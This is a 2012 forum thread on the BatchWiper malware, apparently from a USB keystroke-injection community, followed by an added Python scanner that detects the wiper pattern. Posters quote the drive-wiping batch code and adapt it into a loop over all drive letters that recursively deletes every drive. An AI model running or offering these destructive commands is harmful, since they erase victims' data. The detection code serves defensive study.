Darren Kitchen Posted December 18, 2012
The Iranian CERT has posted notification on a piece of destructive malware based on simple batch files. AlienVault Labs has a writeup here: http://labs.alienvault.com/labs/index.php/2012/batchwiper-just-another-wiping-malware/ They posit that this could be spread by USB. I'm thinking it would be incredibly simple to adapt this into ducky script. Not saying you should go formatting drives, just an interesting observation. I mean it literally is dead simple, look at this code snippet:
[CODE]
sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:
[/CODE]
What are your thoughts on this?
01000010 Posted December 18, 2012 (edited)
It's like carrying around a hammer and breaking the screen. What's the point other than destruction? I guess the hammer would be better because it doesn't need any privileges.
Edited December 18, 2012 by leapole
Xcellerator Posted December 18, 2012
Looks interesting.. Not often you see malware written in batch! I wonder what the reasoning behind it was? The selective dates make it look like a very bespoke bit of work meant to target quite a specific group. As far as porting to the Ducky, it shouldn't be too hard; perhaps the quickest would be to download the batch script from pastebin and run it?
no42 Posted December 18, 2012
Hmmm, rather destructive. From a commercial perspective, it would waste time and money. A decent forensic analysis should be able to recover data, again costing money. From a home user perspective, it would be really annoying. Especially if I had the family camera connected! Again you're relying on user permissions, at home (likely an admin user), at work (likely a low level grunt). Probably achievable through executing the commands through multiple run-boxes. From an infection perspective, wouldn't it be better to write a malicious script in visual-basic or wscript to append that script (if permissions allow) to any *.bat file detected on the system (including attached drives)? We already know the ducky can call a script/binary from mass storage (therefore not reliant on an internet connection for payload delivery).
Darren Kitchen Posted December 18, 2012
And from a government attempting to slow down Iran's attempts at developing nuclear weapons perspective?
no42 Posted December 18, 2012
If I was .gov funded, I would do something more along the lines of http://media.blackhat.com/bh-us-11/Davis/BH_US_11-Davis_USB_Slides.pdf The Ducky is a possible platform to exploit USB driver vulnerabilities. It's just a hassle to find them; most of the easily exploitable bugs are now patched (in common drivers).
01000010 Posted December 18, 2012 (edited)
I would hope any nuclear research facility would be running some kind of back up or something. Now I know there are stupid people everywhere. I think the best way to mess with someone would not be to blank their hard drive (throws up a giant warning flag) but to just modify a few sections of a couple of files (takes forever to figure this out). As an example, what if someone changed a few resistors on the file for the rubber ducky -- would you check that before getting it manufactured? This just reminds me of telling people new to linux rm -rf /
Edited December 18, 2012 by leapole
Xcellerator Posted December 19, 2012
Page 27 of the PowerPoint midnitesnake posted contains the line: "The knowledge of how to emulate USB devices is not widespread". Interesting quote...
reflex Posted December 19, 2012
[QUOTE]I would hope any nuclear research facility would be running some kind of back up or something. Now I know there are stupid people everywhere. I think the best way to mess with someone would not be to blank their hard drive (throws up a giant warning flag) but to just modify a few sections of a couple of files (takes forever to figure this out). As an example, what if someone changed a few resistors on the file for the rubber ducky -- would you check that before getting it manufactured? This just reminds me of telling people new to linux rm -rf /[/QUOTE]
I would hope that any nuclear research facility wouldn't be running some kind of back up. If these weapons didn't exist the world would be a much safer place :)
PineDominator Posted December 19, 2012
Could make a script that auto runs and very slowly populates the C drive with copies of files in every folder. Call it Re.Frager
01000010 Posted December 19, 2012
ooo can anyone say lots of little hidden files. Could take forever to index that stuff.
no42 Posted December 19, 2012 (edited)
[QUOTE]Page 27 of the PowerPoint midnitesnake posted contains the line: "The knowledge of how to emulate USB devices is not widespread". Interesting quote...[/QUOTE]
Yeah, the guy who wrote those slides can't even emulate USB devices. That's where that quote comes from. I'd say the Teensy was quite widespread, since it was used to pwn the PS3. *cough*. Was speaking to him at Blackhat; he's just playing off others' work, that he mentioned on slide 10. Philip Polstra (Uni of Dubuque) knows a lot more, and has written an interesting presentation & whitepaper: Preventing "Oh Shit" Moments for €20 or Less - Black Hat http://www.slideshar.../ppolstra/44con
Edited December 19, 2012 by midnitesnake
Pwnd2Pwnr Posted December 19, 2012
Kind of reminds me of the good 'ol c:\deltree .. :)
overwraith Posted December 19, 2012 (edited)
Maybe modify that "for" loop I wrote to modify the SAM payload, to make the payload shorter.
[CODE]
STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )
STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ del "%a:\*.*" /q /s /f)
[/CODE]
Haven't tested the above yet, for apparent reasons.
Edited December 19, 2012 by overwraith
overwraith Posted December 19, 2012
Ok, tested on a slightly modified command:
[CODE]
for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ dir "%a:\*.*")
[/CODE]
The command I posted in my previous reply should work.
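Added example for this thread, written from the defender's side; it is not code from the AlienVault writeup, the Iranian CERT notice or any poster. It is a small Python scanner that flags batch text matching the wiping pattern in both shapes discussed here: the unrolled "IF EXIST x:\ del "x:\*.*" /q /s /f" followed by Chkdsk from the first post, and the "for %a in (A B C ...) do (...)" loop from overwraith's posts. The three sample scripts are constructed for the example, and the thresholds (two drive roots wiped, or one plus a loop over drive letters) are an assumption of this example, not anything the thread or the writeup states.

```python
"""Scan batch-file text for the BatchWiper drive-wiping pattern.

Added example for the thread (not the AlienVault or CERT code, nor any
poster's): looks for quiet, recursive, forced deletes of an entire drive
root, the chkdsk that follows them, and a "for" loop over bare drive
letters. Sample scripts below are constructed for this example.
"""
import re

# del/erase with an optionally quoted target, then the switches up to the end
# of the command (& | or the closing paren of a for-loop body).
DEL_CMD = re.compile(
    r'\b(?:del|erase)\s+"?(?P<target>[^"\s]+)"?(?P<rest>[^&|\n)]*)', re.IGNORECASE
)
# A target that is a whole drive root: d:\*.* or a loop variable such as %a:\*.*
DRIVE_ROOT = re.compile(r'^(?:[A-Z]|%%?[A-Z]):\\\*\.\*$', re.IGNORECASE)
# chkdsk run against a drive letter or loop variable, as the wiper does after deleting.
CHKDSK = re.compile(r'\bchkdsk\s+%?%?[A-Z]:', re.IGNORECASE)
# "for %a in (A B C ...)": iterating over a list of bare drive letters.
FOR_DRIVES = re.compile(r'\bfor\s+%%?[A-Z]\s+in\s*\(\s*(?:[A-Z]\s+){3,}', re.IGNORECASE)
WIPE_SWITCHES = {"q", "s", "f"}  # quiet, recursive, force read-only files


def scan_batch(text):
    """Return the wiper indicators found in one batch script (line numbers are 1-based)."""
    # Forum pastes turn straight quotes into curly ones; normalise before matching.
    text = text.replace("\u201c", '"').replace("\u201d", '"')
    deletes, chkdsk_lines, drive_loop = [], [], False
    for lineno, line in enumerate(text.splitlines(), 1):
        if FOR_DRIVES.search(line):
            drive_loop = True
        for m in DEL_CMD.finditer(line):
            target = m.group("target")
            switches = {s.lower() for s in re.findall(r"/([a-zA-Z])", m.group("rest"))}
            if DRIVE_ROOT.match(target) and WIPE_SWITCHES <= switches:
                deletes.append((lineno, target))
        if CHKDSK.search(line):
            chkdsk_lines.append(lineno)
    # Threshold chosen for this example: several drive roots wiped, or one
    # drive-root delete driven by a loop over drive letters.
    wiper_like = len(deletes) >= 2 or (bool(deletes) and drive_loop)
    return {
        "drive_root_deletes": deletes,
        "chkdsk_lines": chkdsk_lines,
        "chkdsk_after_delete": bool(deletes) and any(c > deletes[0][0] for c in chkdsk_lines),
        "drive_letter_loop": drive_loop,
        "wiper_like": wiper_like,
    }


# Constructed samples: the unrolled form, the loop form, and a benign build
# script that also uses del and chkdsk but touches no drive root.
UNROLLED_SAMPLE = r'''sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
'''
LOOP_SAMPLE = r'''for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ del "%a:\*.*" /q /s /f)
'''
BENIGN_SAMPLE = r'''@echo off
del "%TEMP%\build\*.obj" /q
for %%f in (*.log) do echo %%f
chkdsk c:
'''

if __name__ == "__main__":
    for name, sample in [("unrolled", UNROLLED_SAMPLE), ("loop", LOOP_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, scan_batch(sample))
```

The benign sample matters as much as the two positives: a rule that fires on any del with /s, or on chkdsk alone, will drown in noise from build and maintenance scripts, so the scanner keys on the combination the thread actually shows, a drive root as the target, all three switches, and either repetition across drives or a loop over drive letters.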